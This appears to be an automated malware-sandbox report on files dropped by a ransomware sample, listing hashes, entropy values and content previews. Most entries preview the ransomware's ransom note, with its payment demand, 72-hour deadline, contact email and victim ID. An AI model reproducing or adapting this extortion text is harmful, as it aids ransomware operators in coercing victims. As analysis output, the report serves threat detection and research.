                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.10740799396908
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:y/GZ5nnwwpR+zzEVzJ9aYtB/5ajNp8zzlULIQXIkP/pnHn:15nnwFzoVt9aYtB/5aj7Elkv/pnHn
                                                                                            MD5:E053CC6FC4B68BB391174D019A3FE27B
                                                                                            SHA1:F4BB404F682A3A6780448B0185FE2F8F8281423F
                                                                                            SHA-256:B6D4BF5C67F52EDBF9D43204DD7C160E38EAF29CE13BAB5F640C9C598CE54963
                                                                                            SHA-512:EAAFC975F7608A640B448C87CCCAE5DBE76A9402272C5CDE84D03F5DDA7BB60CF0CA726D2D1B3E0948AA20BAB819BB203578A42F4E089B47EE75DFCFE65BA148
                                                                                            Malicious:false
                                                                                            Preview:....d..C-&...;b:..........).........yA.g.[.....4..&.\..L`P.B.X.p...Q.\...h.f|...GO%..B$tV..|.Mn....yA.?s....JV..T..H....:..6.:..@. ..g.&DN.B..0.kr...GM...D..C.-..0.8"t.xd..L..].s.8@..3 .J@......Z.Q9.9.|.`cs..%...R....ve..0..\..d..Y8.pg6..-..\XE.J5|I....y..7..... .4Wh.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.123206548941979
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:giFgKkr41WfDfbTksv2CI0g6MtkZ7//ONgoxBA4hXKZWLUuCAn:ngZr41WfnzdgnmUxbXKQguCAn
                                                                                            MD5:339FADFB35D5E7AC8D40DF852DAE646A
                                                                                            SHA1:1D1452136236B97472B5C335354BC73AB40C583F
                                                                                            SHA-256:CC79390B156FE81024078734E3EEF852F9F8F975F9F5829037CAC11D54D97760
                                                                                            SHA-512:235CF69AB86466BEEC24668099929B7B772A2A71C87E496E0BBAF27FD291191C8BDFCDBF9D896E1C0B5FE6DBF4997CE37EBD72662D924A45292D93EDF0C96952
                                                                                            Malicious:false
                                                                                            Preview:...,....o....QC6...........|..V.S.'.K#w0..0.k..A...x.............Xkm......s*..A.........t]...c)M..,.O)..<..;?....S..c..L...5..$U.,..N..nLV..f...2....G...+s....../.*/A..<3......u.?zX....o..:7.....5......o.v....2!BDO.6.......X.............Q=.....CC(1.T-...Sf7.9Y..2.z<<..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1510207563435464
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:NlllulK:NllU
                                                                                            MD5:7C7772684C9836B758223907BC2AEE9B
                                                                                            SHA1:F6FC33AF6B68C788D4F59704A3331A85C43E6FC2
                                                                                            SHA-256:38EC1F523D66248087C3A3D9BCE52F154183337CCA920C7576BF0532F2F92486
                                                                                            SHA-512:E24A56AC8327A7450047ED6599A62F6930B31DFD54E27435AF02EB6083D8896C1383730B7C0A8FB898127714EC8C0770BF8DCA4EA6B3B234FA0516915451878E
                                                                                            Malicious:false
                                                                                            Preview:@...e................................................@..........
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
